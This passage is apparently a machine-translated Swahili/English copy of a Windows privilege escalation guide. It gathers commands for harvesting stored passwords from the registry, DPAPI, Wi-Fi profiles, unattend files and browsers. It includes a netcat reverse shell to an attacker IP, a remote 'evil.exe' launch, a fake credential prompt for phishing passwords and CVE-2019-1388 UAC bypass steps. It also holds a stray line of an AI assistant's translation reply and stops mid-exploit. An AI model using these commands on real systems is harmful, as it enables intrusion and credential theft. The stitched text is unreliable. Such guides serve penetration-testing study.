Get-DnsClientServerAddress -AddressFamily IPv4 | ft

Open Ports

Kagua uwepo wa restricted services kutoka nje

netstat -ano #Opened ports?

Jedwali la Upitishaji

route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

Jedwali la ARP

arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L

Sheria za Firewall

Check this page for Firewall related commands (orodhesha sheria, tengeneza sheria, zima, zima…)

Zaidi commands for network enumeration here

Windows Subsystem for Linux (wsl)

C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe

Faili la binary bash.exe pia linaweza kupatikana katika C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe

Iwapo unapata mtumiaji wa root unaweza kusikiliza kwenye bandari yoyote (wakati wa kwanza unapotumia nc.exe kusikiliza kwenye bandari itakuuliza kupitia GUI kama nc inapaswa kuruhusiwa na firewall).

wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'

Ili kuanza bash kama root kwa urahisi, unaweza kujaribu --default-user root

Unaweza kuchunguza mfumo wa faili wa WSL katika folda C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\

Vyeti vya Windows

Vyeti vya Winlogon

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"

#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword

Credentials manager / Windows vault

From https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault
Windows Vault inahifadhi nywila za watumiaji kwa seva, tovuti na programu nyingine ambazo Windows inaweza kuingia kwa watumiaji moja kwa moja. Mwanzoni, inaweza kuonekana kama watumiaji wanaweza kuhifadhi nywila zao za Facebook, Twitter, Gmail n.k., ili waweze kuingia moja kwa moja kupitia vivinjari. Lakini sivyo.

Windows Vault inahifadhi nywila ambazo Windows inaweza kutumia kuingia watumiaji moja kwa moja, ambayo inamaanisha kwamba yoyote ya Windows application that needs credentials to access a resource (seva au tovuti) can make use of this Credential Manager & Windows Vault na kutumia nywila zilizotolewa badala ya watumiaji kuingiza username and password kila wakati.

Isipokuwa programu zinashirikiana na Credential Manager, sidhani kuwa inawezekana kwao kutumia nywila kwa rasilimali fulani. Kwa hivyo, ikiwa programu yako inataka kutumia vault, inapaswa kwa namna fulani communicate with the credential manager and request the credentials for that resource from the default storage vault.

Tumia cmdkey kuorodhesha nywila zilizohifadhiwa kwenye mashine.

cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator

Kisha unaweza kutumia runas kwa chaguo la /savecred ili kutumia vitambulisho vilivyohifadhiwa. Mfano ufuatao unaita binary ya mbali kupitia share ya SMB.

runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"

Kutumia runas na seti ya kredensiali iliyotolewa.

C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

Kumbuka kwamba mimikatz, lazagne, credentialfileview, VaultPasswordView, au kutoka Empire Powershells module.

DPAPI

The Data Protection API (DPAPI) inatoa njia ya usimbaji fiche wa simetri wa data, inayotumika hasa ndani ya mfumo wa uendeshaji wa Windows kwa ajili ya usimbaji fiche wa simetri wa funguo binafsi zisizo za simetri. Usimbaji huu hutegemea siri ya mtumiaji au ya mfumo ili kuchangia kwa kiasi kikubwa entropia.

DPAPI inaruhusu usimbaji fiche wa funguo kupitia ufunguo wa simetri unaotokana na siri za kuingia za mtumiaji. Katika matukio yanayohusisha usimbaji fiche wa mfumo, inatumia siri za uthibitishaji za domain za mfumo.

Funguo RSA za mtumiaji zilizofichwa kwa kutumia DPAPI zinahifadhiwa katika saraka %APPDATA%\Microsoft\Protect{SID}, ambapo {SID} inawakilisha Security Identifier ya mtumiaji. Ufunguo wa DPAPI, ulioko pamoja na funguo mkuu unaolinda funguo binafsi za mtumiaji kwenye faili moja, kawaida unajumuisha 64 bytes za data za nasibu. (Ni muhimu kutambua kwamba ufikiaji wa saraka hii umewekewa vikwazo, ukizuia orodha ya yaliyomo kwa kutumia amri ya dir katika CMD, ingawa inaruhusiwa kuorodheshwa kupitia PowerShell).

Get-ChildItem  C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem  C:\Users\USER\AppData\Local\Microsoft\Protect\

Unaweza kutumia mimikatz module dpapi::masterkey na hoja zinazofaa (/pvk au /rpc) ili ku-decrypt.

Faili za nyaraka za kuingia zilizolindwa na nywila kuu kwa kawaida ziko katika:

dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Unaweza kutumia mimikatz module dpapi::cred na /masterkey inayofaa ku-decrypt.\ Unaweza kutoa masterkeys nyingi za DPAPI kutoka kumbukumbu kwa kutumia sekurlsa::dpapi module (ikiwa wewe ni root).

DPAPI - Extracting Passwords

PowerShell Credentials

PowerShell credentials mara nyingi hutumika kwa ajili ya scripting na kazi za automation kama njia ya kuhifadhi credentials zilizofichwa kwa urahisi. Credentials hizi zinalindwa kwa kutumia DPAPI, ambayo kwa kawaida ina maana kwamba zinaweza ku-decryptwa tu na mtumiaji yule yule kwenye kompyuta ile ile zilipotengenezwa.

Ili ku-decrypt PS credentials kutoka kwenye faili inayoihifadhi unaweza kufanya:

PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username

john

PS C:\htb> $credential.GetNetworkCredential().password

JustAPWD!

Wifi

#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on*

Muunganisho za RDP zilizohifadhiwa

Unaweza kuzipata kwenye HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
na katika HKCU\Software\Microsoft\Terminal Server Client\Servers\

Amri zilizotumika hivi karibuni

HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

Meneja wa Cheti za Remote Desktop

%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings

Tumia the Mimikatz dpapi::rdg module kwa /masterkey inayofaa ili kufungua faili zozote za .rdg
Unaweza kutoa masterkeys nyingi za DPAPI kutoka kwenye kumbukumbu kwa kutumia Mimikatz sekurlsa::dpapi module

Sticky Notes

Watu mara nyingi hutumia app ya StickyNotes kwenye workstation za Windows kuhifadhi nywila na taarifa nyingine, bila kutambua kwamba ni faili ya database. Faili hii iko C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite na ni vyema kuvitafuta na kuikagua kila wakati.

AppCmd.exe

Kumbuka kwamba ili kupata nywila kutoka AppCmd.exe unahitaji kuwa Administrator na kuendesha chini ya kiwango cha High Integrity.
AppCmd.exe iko katika %systemroot%\system32\inetsrv\ directory.
Ikiwa faili hii ipo basi inawezekana kwamba baadhi ya credentials zimewekwa na zinaweza kurejeshwa.

Msimbo huu ulitolewa kutoka PowerUP:

function Get-ApplicationHost {
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"

# Check if appcmd.exe exists
if (Test-Path  ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
# Create data table to house results
$DataTable = New-Object System.Data.DataTable

# Create and name columns in the data table
$Null = $DataTable.Columns.Add("user")
$Null = $DataTable.Columns.Add("pass")
$Null = $DataTable.Columns.Add("type")
$Null = $DataTable.Columns.Add("vdir")
$Null = $DataTable.Columns.Add("apppool")

# Get list of application pools
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {

# Get application pool name
$PoolName = $_

# Get username
$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
$PoolUser = Invoke-Expression $PoolUserCmd

# Get password
$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
$PoolPassword = Invoke-Expression $PoolPasswordCmd

# Check if credentials exists
if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
}
}

# Get list of virtual directories
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {

# Get Virtual Directory Name
$VdirName = $_

# Get username
$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
$VdirUser = Invoke-Expression $VdirUserCmd

# Get password
$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
$VdirPassword = Invoke-Expression $VdirPasswordCmd

# Check if credentials exists
if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
}
}

# Check if any passwords were found
if( $DataTable.rows.Count -gt 0 ) {
# Display results in list view that can feed into the pipeline
$DataTable |  Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
}
else {
# Status user
Write-Verbose 'No application pool or virtual directory passwords were found.'
$False
}
}
else {
Write-Verbose 'Appcmd.exe does not exist in the default location.'
$False
}
$ErrorActionPreference = $OrigError
}

SCClient / SCCM

Angalia ikiwa C:\Windows\CCM\SCClient.exe ipo .
Wasakinishaji huendeshwa na SYSTEM privileges, wengi wako dhaifu kwa DLL Sideloading (Info from https://github.com/enjoiz/Privesc).

$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }

Mafaili na Registry (Credentials)

Putty Creds

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there

Putty SSH Host Keys

reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\

SSH keys in registry

SSH private keys zinaweza kuhifadhiwa ndani ya registry key HKCU\Software\OpenSSH\Agent\Keys kwa hivyo unapaswa kuangalia kama kuna kitu chochote cha kuvutia huko:

reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'

Ikiwa utakuta rekodi yoyote ndani ya njia hiyo, kuna uwezekano ni ufunguo wa SSH uliohifadhiwa. Imehifadhiwa kwa usimbaji (encrypted) lakini inaweza kufunguliwa kwa urahisi kwa kutumia https://github.com/ropnop/windows_sshagent_extract.
Maelezo zaidi kuhusu mbinu hii hapa: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/

Ikiwa huduma ya ssh-agent haifanyi kazi na unataka ianze moja kwa moja wakati wa boot, endesha:

Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service

Tip

Inaonekana mbinu hii haitumiki tena. Nilijaribu kuunda baadhi ya ssh keys, kuyaongeza kwa ssh-add na kuingia kwa ssh kwenye mashine. Registry HKCU\Software\OpenSSH\Agent\Keys haipo na procmon haikutambua matumizi ya dpapi.dll wakati wa asymmetric key authentication.

Faili zisizotazamwa

C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Unaweza pia kutafuta faili hizi kwa kutumia metasploit: post/windows/gather/enum_unattend

Mfano wa yaliyomo:

<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>

<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>

Chelezo za SAM & SYSTEM

# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Kredensiali za Cloud

#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json

McAfee SiteList.xml

Tafuta faili inayoitwa SiteList.xml

Cached GPP Pasword

Kipengele kilikuwepo hapo awali kilichoruhusu utumaji wa akaunti za local administrator zilizobinafsishwa kwa kundi la mashine kupitia Group Policy Preferences (GPP). Hata hivyo, mbinu hii ilikuwa na mapungufu makubwa ya usalama. Kwanza, Group Policy Objects (GPOs), zilizoifadhiwa kama faili za XML katika SYSVOL, zinaweza kufikiwa na mtumiaji yeyote wa domain. Pili, nywila ndani ya GPP hizi, zilizosimbwa kwa AES256 kwa kutumia default key iliyo wazi kwa umma, zinaweza kufichuliwa na mtumiaji yeyote mwenye uthibitisho. Hii ilisababisha hatari kubwa, kwani inaweza kuruhusu watumiaji kupata ruhusa za juu.

Ili kupunguza hatari hii, ilitengenezwa function ambayo inachunguza faili za GPP zilizohifadhiwa kwa ndani ambazo zina uwanja “cpassword” usio tupu. Ikipata faili kama hiyo, function inafungua nywila na kurudisha custom PowerShell object. Kitu hiki kina maelezo kuhusu GPP na eneo la faili, kusaidia katika utambuzi na ufumbuzi wa udhaifu huu wa usalama.

Tafuta katika C:\ProgramData\Microsoft\Group Policy\history au katika C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (previous to W Vista) kwa faili hizi:

Groups.xml
Services.xml
Scheduledtasks.xml
DataSources.xml
Printers.xml
Drives.xml

To decrypt the cPassword:

#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw

Kutumia crackmapexec ili kupata passwords:

crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin

IIS Web Config

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

Mfano wa web.config yenye credentials:

<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user name="Administrator" password="SuperAdminPassword" />
</credentials>
</forms>
</authentication>

OpenVPN maelezo ya kuingia

Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}

foreach ($item in $items)
{
$encryptedbytes=$item.'auth-data'
$entropy=$item.'entropy'
$entropy=$entropy[0..(($entropy.Length)-2)]

$decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$entropy,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser)

Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}

Logs

# IIS
C:\inetpub\logs\LogFiles\*

#Apache
Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue

Ask for credentials

Unaweza kila wakati kumwomba mtumiaji aingize credentials zake au hata credentials za mtumiaji mwingine ikiwa unadhani anaweza kuzipata (kumbuka kwamba kuuliza mteja moja kwa moja kwa credentials ni kweli hatari):

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password

#Get plaintext
$cred.GetNetworkCredential() | fl

Majina ya faili yanayoweza kuwa na credentials

Mafaili yanayojulikana ambayo wakati fulani uliopita yaliokuwa na passwords katika clear-text au Base64

$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db         #Firefox
key4.db         #Firefox
places.sqlite   #Firefox
"Login Data"    #Chrome
Cookies         #Chrome
Bookmarks       #Chrome
History         #Chrome
TypedURLsTime   #IE
TypedURLs       #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat

I don’t have access to your repository. Please paste the contents of src/windows-hardening/windows-local-privilege-escalation/README.md (or the files you want searched) and I will translate the relevant English text to Swahili, preserving all markdown/html syntax.

cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"

Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

Credentials katika RecycleBin

Pia unapaswa kuangalia Bin kutafuta credentials ndani yake

Ili recover passwords zilizohifadhiwa na programu kadhaa unaweza kutumia: http://www.nirsoft.net/password_recovery_tools.html

Ndani ya registry

Registry keys nyingine zinazoweza kuwa na credentials

reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"

Chukua vifunguo vya openssh kutoka kwenye registry.

Browsers History

Unapaswa kuangalia dbs ambapo nywila za Chrome or Firefox zimehifadhiwa.
Pia angalia historia, bookmarks na favourites za vivinjari kwa sababu labda baadhi ya nywila zimehifadhiwa huko.

Tools to extract passwords from browsers:

Mimikatz: dpapi::chrome
SharpWeb
SharpChromium
SharpDPAPI

COM DLL Overwriting

Component Object Model (COM) ni teknolojia iliyojengwa ndani ya mfumo wa uendeshaji wa Windows ambayo inaruhusu intercommunication kati ya vipengele vya programu vya lugha tofauti. Kila kipengele cha COM kinatambulika kupitia class ID (CLSID) na kila kipengele kinaonyesha utendakazi kupitia interface moja au zaidi, zinazo tambuliwa kupitia interface IDs (IIDs).

COM classes na interfaces zimetangazwa kwenye registry chini ya HKEY\CLASSES\ROOT\CLSID na HKEY\CLASSES\ROOT\Interface mtawalia. Registry hii inaundwa kwa kuunganisha HKEY\LOCAL\MACHINE\Software\Classes + HKEY\CURRENT\USER\Software\Classes = HKEY\CLASSES\ROOT.

Ndani ya CLSIDs za registry hii unaweza kupata registry tunda InProcServer32 ambayo ina default value inayorejelea DLL na thamani iitwayo ThreadingModel ambayo inaweza kuwa Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) au Neutral (Thread Neutral).

Kwa msingi, ikiwa unaweza kuoverwrite yoyote ya DLLs zitakazotekelezwa, unaweza escalate privileges ikiwa DLL hiyo itatekelezwa na mtumiaji mwingine.

To learn how attackers use COM Hijacking as a persistence mechanism check:

COM Hijacking

Generic Password search in files and registry

Tafuta yaliyomo ya faili

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*

Tafuta faili lenye jina fulani

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini

Tafuta katika registry kwa key names na passwords

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d

Tools that search for passwords

MSF-Credentials Plugin ni plugin ya msf niliyoitengeneza plugin hii ili automatically execute every metasploit POST module that searches for credentials inside the victim.
Winpeas hutafuta moja kwa moja faili zote zenye passwords zilizotajwa kwenye ukurasa huu.
Lazagne ni zana nyingine nzuri ya kutoa password kutoka kwenye mfumo.

Zana SessionGopher inatafuta sessions, usernames and passwords of several tools that save this data in clear text (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP)

Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss

Leaked Handlers

Fikiria kwamba mchakato unaoendesha kama SYSTEM unafungua mchakato mpya (OpenProcess()) ukiwa na ufikiaji kamili. Mchakato ule ule pia huunda mchakato mpya (CreateProcess()) ukiwa na vibali vya chini lakini ukirithisha handles zote zilizofunguliwa za mchakato mkuu.
Kisha, ikiwa una ufikiaji kamili kwa mchakato wa vibali vya chini, unaweza kuchukua open handle to the privileged process created na OpenProcess() na kuingiza shellcode.
Read this example for more information about how to detect and exploit this vulnerability.
Read this other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access).

Named Pipe Client Impersonation

Shared memory segments, referred to as pipes, enable process communication and data transfer.

Windows provides a feature called Named Pipes, allowing unrelated processes to share data, even over different networks. This resembles a client/server architecture, with roles defined as named pipe server and named pipe client.

When data is sent through a pipe by a client, the server that set up the pipe has the ability to take on the identity of the client, assuming it has the necessary SeImpersonate rights. Identifying a privileged process that communicates via a pipe you can mimic provides an opportunity to gain higher privileges by adopting the identity of that process once it interacts with the pipe you established. For instructions on executing such an attack, helpful guides can be found here and here.

Also the following tool allows to intercept a named pipe communication with a tool like burp: https://github.com/gabriel-sztejnworcel/pipe-intercept and this tool allows to list and see all the pipes to find privescs https://github.com/cyberark/PipeViewer

Mengine

Miendelezo ya faili zinazoweza kuendesha vitu kwenye Windows

Angalia ukurasa https://filesec.io/

Kufuatilia mistari ya amri kwa nywila

When getting a shell as a user, there may be scheduled tasks or other processes being executed which pass credentials on the command line. The script below captures process command lines every two seconds and compares the current state with the previous state, outputting any differences.

while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}

Kuiba nywila kutoka kwa michakato

Kutoka Low Priv User hadi NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass

Ikiwa una ufikiaji wa kiolesura cha picha (via console or RDP) na UAC imewezeshwa, katika baadhi ya matoleo ya Microsoft Windows inawezekana kuendesha terminal au mchakato mwingine wowote kama “NT\AUTHORITY SYSTEM” kutoka kwa unprivileged user.

Hii inafanya iwezekane escalate privileges na bypass UAC kwa wakati mmoja kupitia udhaifu ule ule. Zaidi ya hayo, hakuna haja ya kusakinisha chochote na binary inayotumika wakati wa mchakato imesainiwa na imetolewa na Microsoft.

Baadhi ya mifumo iliyoathiriwa ni zifuatazo:

SERVER
======

Windows 2008r2	7601	** link OPENED AS SYSTEM **
Windows 2012r2	9600	** link OPENED AS SYSTEM **
Windows 2016	14393	** link OPENED AS SYSTEM **
Windows 2019	17763	link NOT opened


WORKSTATION
===========

Windows 7 SP1	7601	** link OPENED AS SYSTEM **
Windows 8		9200	** link OPENED AS SYSTEM **
Windows 8.1		9600	** link OPENED AS SYSTEM **
Windows 10 1511	10240	** link OPENED AS SYSTEM **
Windows 10 1607	14393	** link OPENED AS SYSTEM **
Windows 10 1703	15063	link NOT opened
Windows 10 1709	16299	link NOT opened

Ili kutumia udhaifu huu, ni muhimu kufanya hatua zifuatazo:

1) Right click on the HHUPD.EXE file and run it as Administrator.

2) When the UAC prompt appears, select "Show more details".

3) Click "Show publisher certificate information".

4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.

5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.

6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.

7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.

8) Remember to cancel setup and the UAC prompt to return to your desktop.

You have all the necessary files and information in the following GitHub repository:

https://github.com/jas502n/CVE-2019-1388

From Administrator Medium to High Integrity Level / UAC Bypass

Soma hili ili ujifunze kuhusu Integrity Levels:

Integrity Levels

Kisha soma hili ili ujifunze kuhusu UAC na UAC bypasses:

UAC - User Account Control

From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP

Techniques iliyotajwa in this blog post na kodi ya exploit available here.

Shambulio hilo kwa ujumla linamaguso ya kutumia rollback feature ya Windows Installer kubadilisha faili halali na zisizo salama wakati wa mchakato wa uninstall. Kwa hili mwendaji anahitaji kuunda MSI installer mbaya ambayo itatumika ku-hijack C:\Config.Msi folda, ambayo baadaye itatumika na Windows Installer kuhifadhi rollback files wakati wa uninstall ya vifurushi vingine vya MSI ambapo faili za rollback zilibadilishwa kuwa na payload mbaya.

Mbinu iliyosummarize ni ifuatayo:

Stage 1 – Kujiandaa kwa Hijack (acha C:\Config.Msi iwe tupu)

Step 1: Install the MSI
Tengeneza .msi inayosakinisha faili isiyo hatari (mfano, dummy.txt) katika folder inayoweza kuandikwa (TARGETDIR).
Weka installer kama “UAC Compliant”, ili mtumiaji asiye-admin aweze kuiongeza.
Weka handle wazi kwa faili baada ya install.
Step 2: Begin Uninstall
Uninstall .msi ile ile.
Mchakato wa uninstall unaanza kuhamisha faili hadi C:\Config.Msi na kuziita jina la .rbf (rollback backups).
Poll the open file handle kwa kutumia GetFinalPathNameByHandle ili kugundua wakati faili inakuwa C:\Config.Msi\<random>.rbf.
Step 3: Custom Syncing
.msi ina custom uninstall action (SyncOnRbfWritten) ambayo:
Inatoa ishara wakati .rbf imeandikwa.
Kisha inasubiri kwenye event nyingine kabla ya kuendeleza uninstall.
Step 4: Block Deletion of .rbf
